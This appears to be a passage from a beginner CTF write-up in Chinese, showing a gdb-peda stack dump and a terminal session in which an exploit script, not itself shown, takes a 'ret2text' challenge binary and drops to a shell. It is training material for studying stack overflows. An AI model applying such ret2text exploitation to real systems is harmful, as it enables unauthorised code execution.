0xffffd790:   0x706d622e   0x3b31303d   0x2a3a3533   0x6d62702e
0xffffd7a0:   0x3b31303d   0x2a3a3533   0x6d67702e   0x3b31303d
0xffffd7b0:   0x2a3a3533   0x6d70702e   0x3b31303d   0x2a3a3533
0xffffd7c0:   0xe   0x3b31303d   0x2a3a3533   0x6d62782e
0xffffd7d0:   0x3b31303d   0x2a3a3533   0x6d70782e   0x3b31303d
0xffffd7e0:   0x2a3a3533   0xe   0x3b31303d   0x2a3a3533
0xffffd7f0:   0xe   0x31303d66   0x3a35333b   0x6e702e2a
0xffffd800:   0x31303d67   0x3a35333b   0x76732e2a   0x31303d67
0xffffd810:   0x3a35333b   0x76732e2a   0x303d7a67   0x35333b31
0xffffd820:   0x6d2e2a3a   0x303d676e   0x35333b31   0x702e2a3a
0xffffd830:   0x303d7863   0x35333b31   0x6d2e2a3a   0x303d766f
0xffffd840:   0x35333b31   0x6d2e2a3a   0x303d6770   0x35333b31
0xffffd850:   0x6d2e2a3a   0x3d   0x333b3130   0x2e2a3a35
0xffffd860:   0x3d76326d   0x333b3130   0x2e2a3a35   0x3d766b6d
0xffffd870:   0x333b3130   0x2e2a3a35   0x6d   0x3b31303d
0xffffd880:   0x2a3a3533   0x6d676f2e   0x3b31303d   0x2a3a3533
0xffffd890:   0x34706d2e   0x3b31303d   0x2a3a3533   0x76346d2e
0xffffd8a0:   0x3b31303d   0x2a3a3533   0x34706d2e   0x31303d76
0xffffd8b0:   0x3a35333b   0x6f762e2a   0x31303d62   0x3a35333b
0xffffd8c0:   0x74712e2a   0x3b31303d   0x2a3a3533   0x76756e2e
0xffffd8d0:   0x3b31303d   0x2a3a3533   0x766d772e   0x3b31303d
0xffffd8e0:   0x2a3a3533   0xe   0x3b31303d   0x2a3a3533
0xffffd8f0:   0x3d6d722e   0x333b3130   0x2e2a3a35   0x62766d72
0xffffd900:   0x3b31303d   0x2a3a3533   0x636c662e   0x3b31303d
0xffffd910:   0x2a3a3533   0xe   0x3b31303d   0x2a3a3533
0xffffd920:   0x696c662e   0x3b31303d   0x2a3a3533   0x766c662e
0xffffd930:   0x3b31303d   0x2a3a3533   0x3d6c672e   0x333b3130
0xffffd940:   0x2e2a3a35   0x303d6c64   0x35333b31   0x782e2a3a
0xffffd950:   0x303d6663   0x35333b31   0x782e2a3a   0x303d6477
0xffffd960:   0x35333b31   0x792e2a3a   0x303d7675   0x35333b31
0xffffd970:   0x632e2a3a   0x303d6d67   0x35333b31   0x652e2a3a
0xffffd980:   0x303d666d   0x35333b31   0x612e2a3a   0x303d7678
0xffffd990:   0x35333b31   0x612e2a3a   0x303d786e   0x35333b31
0xffffd9a0:   0x6f2e2a3a   0x303d7667   0x35333b31   0x6f2e2a3a
0xffffd9b0:   0x303d7867   0x35333b31   0x612e2a3a   0x303d6361
0xffffd9c0:   0x36333b30   0x612e2a3a   0x30303d75   0x3a36333b
0xffffd9d0:   0x6c662e2a   0x303d6361   0x36333b30   0x6d2e2a3a
0xffffd9e0:   0x303d6469   0x36333b30   0x6d2e2a3a   0x3d
0xffffd9f0:   0x333b3030   0x2e2a3a36   0x3d616b6d   0x333b3030
0xffffda00:   0x2e2a3a36   0x3d33706d   0x333b3030   0x2e2a3a36
0xffffda10:   0x3d63706d   0x333b3030   0x2e2a3a36   0x3d67676f
gdb-peda$ quit
ningan@ubuntu:~/anan/test$
ningan@ubuntu:~/anan/test$
ningan@ubuntu:~/anan/test$ ll
total 28
drwxrwxr-x 2 ningan ningan 4096 May 18 22:08 ./
drwxrwxr-x 7 ningan ningan 4096 May 18 20:04 ../
-rw------- 1 ningan ningan 294 May 18 22:08 .gdb_history
-rw-rw-r-- 1 ningan ningan 7 May 18 20:33 peda-session-ret2text.txt
-rwxrwxrwx 1 ningan ningan 9915 May 18 20:01 ret2text*
ningan@ubuntu:~/anan/test$ vim exp.py
ningan@ubuntu:~/anan/test$
ningan@ubuntu:~/anan/test$ python exp.py ret2text
File "exp.py", line 7
SyntaxError: Non-ASCII character '\xe5' in file exp.py on line 7, but no encoding declared; see http://www.python.org/peps/pep-0263.html for details
ningan@ubuntu:~/anan/test$ vim exp.py
ningan@ubuntu:~/anan/test$ python exp.py ret2text
[+] Starting local process './ret2text': pid 3807
[*] '/home/ningan/anan/test/ret2text'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x)
[*] Switching to interactive mode
There is something amazing here, do you know anything?
Maybe I will tell you next time !$ ls
exp.py peda-session-ret2text.txt ret2text
$

pwn，获取系统权限，入门题，cyclic

相关推荐